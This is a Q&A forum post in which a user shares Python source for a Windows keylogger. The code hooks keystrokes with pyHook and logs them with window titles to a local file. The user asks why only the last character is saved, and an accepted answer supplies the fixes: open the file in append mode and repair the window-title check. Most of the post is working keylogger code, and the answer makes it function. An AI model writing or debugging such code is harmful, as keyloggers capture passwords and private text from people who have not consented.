# Need Help For This Keyloger

Tags: python

This source has a problem.
Once inside a program like Notepad to write a text that was written just last character

For example, the program notepad write: "I am a programmer"
But the keylogger files stored on it:

```
[*] Window activated. [2015-11-25 09: 57: 08.805000]
**********************
  Untitled - Notepad |
**********************
r
```

Where is the problem? What should I do ? Please advise me

```
from threading import Timer
import subprocess, socket, base64, time, datetime
import pythoncom, pyHook, win32api, win32gui,win32con, smtplib
from time import strftime,gmtime
LOG_ACTIVE=''
LOG_FILENAME="kianoush.txt"
def OnKeyboardEvent(event):
    global LOG_TEXT, LOG_FILE, LOG_STATE, LOG_ACTIVE, main_thread_id
    LOG_TEXT = ""
    LOG_FILE = open(LOG_FILENAME, 'w')
    WindowsTitle=''
    wg=win32gui
    LOG_NEWACTIVE = NewWindowsTitle     =                wg.GetWindowText(wg.GetForegroundWindow())
    if NewWindowsTitle!=WindowsTitle:
              LOG_DATE = datetime.datetime.now()
              LOG_TEXT += "\n\n[*] Window activated. [" +      str(LOG_DATE)    + "] \n"
              LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n"
              LOG_TEXT += " " + LOG_NEWACTIVE + " |\n"
              LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n\n"
              print LOG_TEXT
              WindowsTitle=NewWindowsTitle 
              LOG_FILE.write(LOG_TEXT)    
              LOG_TEXT = ""  
    if event.Ascii == 8: LOG_TEXT += "\b"
    elif event.Ascii == 13 or event.Ascii == 9: LOG_TEXT += "\n"
    else: LOG_TEXT += str(chr(event.Ascii))
    LOG_FILE.write(LOG_TEXT)
    LOG_FILE.close()
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
```

Answer (score 1, accepted):

I see two main issues in your code:

- opening a file with 'w' mode destroy its current content. You should use 'a' (append)
- the code that detects a new window is broken and always compare the window name with '', resulting in the header printed for every call